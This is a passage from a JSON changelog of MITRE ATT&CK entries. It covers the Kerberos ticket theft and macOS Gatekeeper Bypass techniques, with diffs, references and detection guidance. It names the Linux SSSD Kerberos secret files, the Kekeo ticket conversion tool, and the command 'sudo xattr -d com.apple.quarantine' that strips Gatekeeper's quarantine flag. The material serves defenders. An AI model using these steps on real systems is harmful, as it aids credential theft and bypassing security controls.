2021.\", \"old_value\": \"Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.\"}, \"root['external_references'][6]['url']\": {\"new_value\": \"https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf\", \"old_value\": \"https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285\"}, \"root['external_references'][7]['source_name']\": {\"new_value\": \"Kekeo\", \"old_value\": \"Microsoft Detecting Kerberoasting Feb 2018\"}, \"root['external_references'][7]['description']\": {\"new_value\": \"Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.\", \"old_value\": \"Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.\"}, \"root['external_references'][7]['url']\": {\"new_value\": \"https://github.com/gentilkiwi/kekeo\", \"old_value\": \"https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/\"}, \"root['external_references'][8]['source_name']\": {\"new_value\": \"SpectorOps Bifrost Kerberos macOS 2019\", \"old_value\": \"AdSecurity Cracking Kerberos Dec 2015\"}, \"root['external_references'][8]['description']\": {\"new_value\": \"Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.\", \"old_value\": \"Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \\u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.\"}, \"root['external_references'][8]['url']\": {\"new_value\": \"https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f\", \"old_value\": \"https://adsecurity.org/?p=2293\"}, \"root['external_references'][9]['source_name']\": {\"new_value\": \"macOS kerberos framework MIT\", \"old_value\": \"Medium Detecting Attempts to Steal Passwords from Memory\"}, \"root['external_references'][9]['description']\": {\"new_value\": \"Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.\", \"old_value\": \"French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.\"}, \"root['external_references'][9]['url']\": {\"new_value\": \"http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html\", \"old_value\": \"https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\\n\\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\\n\\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \\n\\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\\n\\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\\n\\nMonitor for unusual processes accessing\\u00a0secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.\", \"old_value\": \"Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\\n\\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\\n\\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \\n\\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\\n\\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\", \"diff\": \"--- \\n+++ \\n@@ -7,3 +7,5 @@\\n Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\\n \\n Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\\n+\\n+Monitor for unusual processes accessing\\u00a0secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}, \"iterable_item_added\": {\"root['external_references'][10]\": {\"source_name\": \"ADSecurity Detecting Forged Tickets\", \"description\": \"Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.\", \"url\": \"https://adsecurity.org/?p=1515\"}, \"root['external_references'][11]\": {\"source_name\": \"Stealthbits Detect PtT 2019\", \"description\": \"Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.\", \"url\": \"https://blog.stealthbits.com/detect-pass-the-ticket-attacks\"}, \"root['external_references'][12]\": {\"source_name\": \"CERT-EU Golden Ticket Protection\", \"description\": \"Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.\", \"url\": \"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf\"}, \"root['external_references'][13]\": {\"source_name\": \"Microsoft Kerberos Golden Ticket\", \"description\": \"Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.\", \"url\": \"https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285\"}, \"root['external_references'][14]\": {\"source_name\": \"Microsoft Detecting Kerberoasting Feb 2018\", \"description\": \"Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.\", \"url\": \"https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/\"}, \"root['external_references'][15]\": {\"source_name\": \"AdSecurity Cracking Kerberos Dec 2015\", \"description\": \"Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \\u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.\", \"url\": \"https://adsecurity.org/?p=2293\"}, \"root['external_references'][16]\": {\"source_name\": \"Medium Detecting Attempts to Steal Passwords from Memory\", \"description\": \"French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.\", \"url\": \"https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea\"}, \"root['x_mitre_data_sources'][0]\": \"File: File Access\", \"root['x_mitre_data_sources'][1]\": \"Command: Command Execution\", \"root['x_mitre_platforms'][1]\": \"Linux\", \"root['x_mitre_platforms'][2]\": \"macOS\"}}",
"previous_version": "1.2",
"version_change": "1.2 \u2192 1.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to subvert Kerberos authentication b | t | 1 | Adversaries may attempt to subvert Kerberos authentication b |
| > | y stealing or forging Kerberos tickets to enable [Pass the T | > | y stealing or forging Kerberos tickets to enable [Pass the T | ||
| > | icket](https://attack.mitre.org/techniques/T1550/003). Ker | > | icket](https://attack.mitre.org/techniques/T1550/003). Kerbe | ||
| > | beros is an authentication protocol widely used in modern Wi | > | ros is an authentication protocol widely used in modern Wind | ||
| > | ndows domain environments. In Kerberos environments, referre | > | ows domain environments. In Kerberos environments, referred | ||
| > | d to as \u201crealms\u201d, there are three basic participants: client | > | to as \u201crealms\u201d, there are three basic participants: client, | ||
| > | , service, and Key Distribution Center (KDC).(Citation: ADSe | > | service, and Key Distribution Center (KDC).(Citation: ADSecu | ||
| > | curity Kerberos Ring Decoder) Clients request access to a se | > | rity Kerberos Ring Decoder) Clients request access to a serv | ||
| > | rvice and through the exchange of Kerberos tickets, originat | > | ice and through the exchange of Kerberos tickets, originatin | ||
| > | ing from KDC, they are granted access after having successfu | > | g from KDC, they are granted access after having successfull | ||
| > | lly authenticated. The KDC is responsible for both authentic | > | y authenticated. The KDC is responsible for both authenticat | ||
| > | ation and ticket granting. Attackers may attempt to abuse K | > | ion and ticket granting. Attackers may attempt to abuse Ker | ||
| > | erberos by stealing tickets or forging tickets to enable una | > | beros by stealing tickets or forging tickets to enable unaut | ||
| > | uthorized access. | > | horized access. On Windows, the built-in <code>klist</code> | ||
| > | utility can be used to list and analyze cached Kerberos tic | ||||
| > | kets.(Citation: Microsoft Klist) Linux systems on Active Di | ||||
| > | rectory domains store Kerberos credentials locally in the cr | ||||
| > | edential cache file referred to as the \"ccache\". The credent | ||||
| > | ials are stored in the ccache file while they remain valid a | ||||
| > | nd generally while a user's session lasts.(Citation: MIT cca | ||||
| > | che) On modern Redhat Enterprise Linux systems, and derivati | ||||
| > | ve distributions, the System Security Services Daemon (SSSD) | ||||
| > | handles Kerberos tickets. By default SSSD maintains a copy | ||||
| > | of the ticket database that can be found in <code>/var/lib/s | ||||
| > | ss/secrets/secrets.ldb</code> as well as the corresponding k | ||||
| > | ey located in <code>/var/lib/sss/secrets/.secrets.mkey</code | ||||
| > | >. Both files require root access to read. If an adversary i | ||||
| > | s able to access the database and key, the credential cache | ||||
| > | Kerberos blob can be extracted and converted into a usable K | ||||
| > | erberos ccache file that adversaries may use for [Pass the T | ||||
| > | icket](https://attack.mitre.org/techniques/T1550/003). The c | ||||
| > | cache file may also be converted into a Windows format using | ||||
| > | tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Cita | ||||
| > | tion: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos | ||||
| > | tickets on macOS are stored in a standard ccache format, sim | ||||
| > | ilar to Linux. By default, access to these ccache entries is | ||||
| > | federated through the KCM daemon process via the Mach RPC p | ||||
| > | rotocol, which uses the caller's environment to determine ac | ||||
| > | cess. The storage location for these ccache entries is influ | ||||
| > | enced by the <code>/etc/krb5.conf</code> configuration file | ||||
| > | and the <code>KRB5CCNAME</code> environment variable which c | ||||
| > | an specify to save them to disk or keep them protected via t | ||||
| > | he KCM daemon. Users can interact with ticket storage using | ||||
| > | <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, | ||||
| > | and <code>kcc</code> built-in binaries or via Apple's nativ | ||||
| > | e Kerberos framework. Adversaries can use open source tools | ||||
| > | to interact with the ccache files directly or to use the Ker | ||||
| > | beros framework to call lower-level APIs for extracting the | ||||
| > | user's TGT or Service Tickets.(Citation: SpectorOps Bifrost | ||||
| > | Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) | ||||
| > |
xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 21:18:32.225000+00:00\", \"old_value\": \"2021-04-26 15:41:39.612000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1024: Restrict Registry Permissions",
"M1028: Operating System Configuration",
"M1038: Execution Prevention",
"M1054: Software Configuration"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Metadata)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-05 16:16:08.471000+00:00",
"modified": "2021-10-14 21:18:30.629000+00:00",
"name": "Gatekeeper Bypass",
"description": "Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\n\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\n\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1553/001",
"external_id": "T1553.001"
},
{
"source_name": "TheEclecticLightCompany apple notarization ",
"description": "How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.",
"url": "https://eclecticlight.co/2020/08/28/how-notarization-works/"
},
{
"source_name": "Bypassing Gatekeeper",
"description": "Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.",
"url": "https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/"
},
{
"source_name": "20 macOS Common Tools and Techniques",
"description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
"url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
},
{
"source_name": "TheEclecticLightCompany Quarantine and the flag",
"description": "hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.",
"url": "https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/"
},
{
"source_name": "theevilbit gatekeeper bypass 2021",
"description": "Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.",
"url": "https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/"
},
{
"source_name": "Methods of Mac Malware Persistence",
"description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.",
"url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
},
{
"source_name": "Clearing quarantine attribute",
"description": "Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.",
"url": "https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/"
},
{
"source_name": "OceanLotus for OS X",
"description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.",
"url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Metadata",
"File: File Modification",
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Application control",
"Anti-virus"
],
"x_mitre_detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 21:18:30.629000+00:00\", \"old_value\": \"2020-06-20 22:41:20.063000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\\n\\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\\n\\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)\", \"old_value\": \"Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. \\n\\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won\\u2019t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)\\n \\nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS\\u2019s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. \\n+Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\\n \\n-Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won\\u2019t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)\\n- \\n-In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS\\u2019s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)\\n+The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\\n+\\n+Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)\"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"TheEclecticLightCompany apple notarization \", \"old_value\": \"Methods of Mac Malware Persistence\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.\", \"old_value\": \"Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://eclecticlight.co/2020/08/28/how-notarization-works/\", \"old_value\": \"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Bypassing Gatekeeper\", \"old_value\": \"Clearing quarantine attribute\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.\", \"old_value\": \"Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/\", \"old_value\": \"https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"20 macOS Common Tools and Techniques\", \"old_value\": \"OceanLotus for OS X\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.\", \"old_value\": \"Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\", \"old_value\": \"https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"TheEclecticLightCompany Quarantine and the flag\", \"old_value\": \"Bypassing Gatekeeper\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.\", \"old_value\": \"Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/\", \"old_value\": \"https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/\"}, \"root['x_mitre_detection']\": {\"new_value\": \"The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \\n\\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \\n\\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)\", \"old_value\": \"Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n-Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\\n+The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \\n+\\n+Review false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \\n+\\n+QuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][5]\": {\"source_name\": \"theevilbit gatekeeper bypass 2021\", \"description\": 